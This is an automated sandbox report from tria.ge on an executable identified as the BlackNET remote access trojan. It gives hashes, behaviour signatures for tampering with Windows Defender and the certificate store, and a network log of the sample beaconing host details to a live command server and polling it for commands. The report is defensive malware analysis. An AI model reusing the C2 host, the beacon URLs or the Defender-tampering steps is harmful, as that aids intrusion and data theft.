Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

b7f26ed595...7N.exe

windows7-x64

10

b7f26ed595...7N.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    106s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18/10/2024, 09:20 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67N.exe

  • Size

    80KB

  • MD5

    5e9b98c2f36af17ffe7c294a11097080

  • SHA1

    8baf5b7edc1fb3575bba6906c1fa539a6a04ad93

  • SHA256

    b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67

  • SHA512

    5889fcced094979f57ebc1893c9fe2d477176f10e439bf1a20a43d9ff8fa60027deb9d472e9b1eb3cd4b1431ee84f1e7961b04c57eb866e5a18eba509d2ad40c

  • SSDEEP

    1536:QPvK/3zvzVJJicVLhilofsh2jzJxuOmb54vHTL+lf:Qi5ikFSofrzVmb5uHv+lf

Score
10/10
blacknetevasiontrojan

Malware Config

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

    trojanblacknet
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • Windows security modification 2 TTPs 1 IoCs
    evasiontrojan
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67N.exe
    "C:\Users\Admin\AppData\Local\Temp\b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67N.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Windows security modification
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2584

Network

  • flag-us
    DNS
    www.gunnylaumienphi2017.com
    b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67N.exe
    Remote address:
    8.8.8.8:53
    Request
    www.gunnylaumienphi2017.com
    IN A
    Response
    www.gunnylaumienphi2017.com
    IN A
    103.92.25.194
  • flag-vn
    GET
    https://www.gunnylaumienphi2017.com//connection.php?data=SGFjS2VkX0Q5MjZEMUJFfEJOfFhQQUpPVElZfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDcgVWx0aW1hdGUgfEJOfE4vQXxCTnxPbmxpbmV8Qk58bm98Qk58QWRtaW5pc3RyYXRvcg==
    b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67N.exe
    Remote address:
    103.92.25.194:443
    Request
    GET //connection.php?data=SGFjS2VkX0Q5MjZEMUJFfEJOfFhQQUpPVElZfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDcgVWx0aW1hdGUgfEJOfE4vQXxCTnxPbmxpbmV8Qk58bm98Qk58QWRtaW5pc3RyYXRvcg== HTTP/1.1
    Host: www.gunnylaumienphi2017.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html
    Last-Modified: Wed, 16 Oct 2024 12:19:04 GMT
    Accept-Ranges: bytes
    ETag: "b24c9197c51fdb1:0"
    Server: Microsoft-IIS/8.5
    X-Powered-By: ASP.NET
    Date: Fri, 18 Oct 2024 09:21:17 GMT
    Content-Length: 14578
  • flag-vn
    GET
    https://www.gunnylaumienphi2017.com//receive.php?command=T25saW5l&vicID=SGFjS2VkX0Q5MjZEMUJF
    b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67N.exe
    Remote address:
    103.92.25.194:443
    Request
    GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0Q5MjZEMUJF HTTP/1.1
    Host: www.gunnylaumienphi2017.com
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html
    Last-Modified: Wed, 16 Oct 2024 12:19:04 GMT
    Accept-Ranges: bytes
    ETag: "b24c9197c51fdb1:0"
    Server: Microsoft-IIS/8.5
    X-Powered-By: ASP.NET
    Date: Fri, 18 Oct 2024 09:21:17 GMT
    Content-Length: 14578
  • flag-vn
    GET
    https://www.gunnylaumienphi2017.com//getCommand.php?id=SGFjS2VkX0Q5MjZEMUJF
    b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67N.exe
    Remote address:
    103.92.25.194:443
    Request
    GET //getCommand.php?id=SGFjS2VkX0Q5MjZEMUJF HTTP/1.1
    Host: www.gunnylaumienphi2017.com
    Response
    HTTP/1.1 200 OK
    Content-Type: text/html
    Last-Modified: Wed, 16 Oct 2024 12:19:04 GMT
    Accept-Ranges: bytes
    ETag: "b24c9197c51fdb1:0"
    Server: Microsoft-IIS/8.5
    X-Powered-By: ASP.NET
    Date: Fri, 18 Oct 2024 09:21:19 GMT
    Content-Length: 14578
  • 103.92.25.194:443
    https://www.gunnylaumienphi2017.com//getCommand.php?id=SGFjS2VkX0Q5MjZEMUJF
    tls, http
    b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67N.exe
    2.1kB
     49.6kB
     27
    39

    HTTP Request

    GET https://www.gunnylaumienphi2017.com//connection.php?data=SGFjS2VkX0Q5MjZEMUJFfEJOfFhQQUpPVElZfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDcgVWx0aW1hdGUgfEJOfE4vQXxCTnxPbmxpbmV8Qk58bm98Qk58QWRtaW5pc3RyYXRvcg==

    HTTP Response

    200

    HTTP Request

    GET https://www.gunnylaumienphi2017.com//receive.php?command=T25saW5l&vicID=SGFjS2VkX0Q5MjZEMUJF

    HTTP Response

    200

    HTTP Request

    GET https://www.gunnylaumienphi2017.com//getCommand.php?id=SGFjS2VkX0Q5MjZEMUJF

    HTTP Response

    200
  • 8.8.8.8:53
    www.gunnylaumienphi2017.com
    dns
    b7f26ed5953814dd875d5305b4f8cc5b8443ded5fa6883ac69ffa6952b6cfe67N.exe
    73 B
     89 B
     1
    1

    DNS Request

    www.gunnylaumienphi2017.com

    DNS Response

    103.92.25.194

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2584-12-0x0000000002810000-0x0000000002818000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2584-11-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2584-23-0x0000000002A54000-0x0000000002A57000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2584-22-0x0000000002A5B000-0x0000000002AC2000-memory.dmp

    Filesize

    412KB

    Download

  • memory/2884-0-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2884-1-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-2-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-3-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-4-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-5-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-6-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-13-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-14-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-16-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-15-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-17-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-18-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-19-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-21-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-20-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-24-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-25-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-26-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-27-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-29-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-28-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-31-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-33-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-34-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-36-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-35-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-32-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-30-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-37-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-38-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-39-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-41-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-40-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-42-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-43-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-44-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-45-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-46-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-48-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-47-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-50-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-49-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-51-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2884-52-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-53-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-54-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-55-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-56-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-57-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-59-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-58-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-60-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-61-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-62-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-64-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-65-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-67-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-68-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-66-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-70-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-71-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-72-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-69-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-74-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-73-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-75-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-76-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-63-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-77-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-79-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-78-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-80-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-81-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-82-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-85-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-87-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-86-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-84-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-83-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-88-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2884-89-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.